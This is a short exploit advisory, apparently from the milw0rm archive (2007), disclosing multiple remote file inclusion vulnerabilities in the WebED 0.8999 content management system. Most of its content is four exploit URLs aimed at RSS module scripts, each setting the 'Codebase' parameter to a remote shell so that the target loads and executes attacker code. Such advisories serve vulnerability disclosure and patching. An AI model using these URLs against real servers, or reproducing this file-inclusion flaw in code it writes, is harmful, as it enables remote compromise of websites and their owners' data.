--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Multiple Remote File Inclusion Vulnerability --------------------------------------------------------------- # Author: MhZ91 nobody.91@hotmail.it # Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz # Exploit: # http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell] --------------------------------------------------------------- # milw0rm.com [2007-09-08]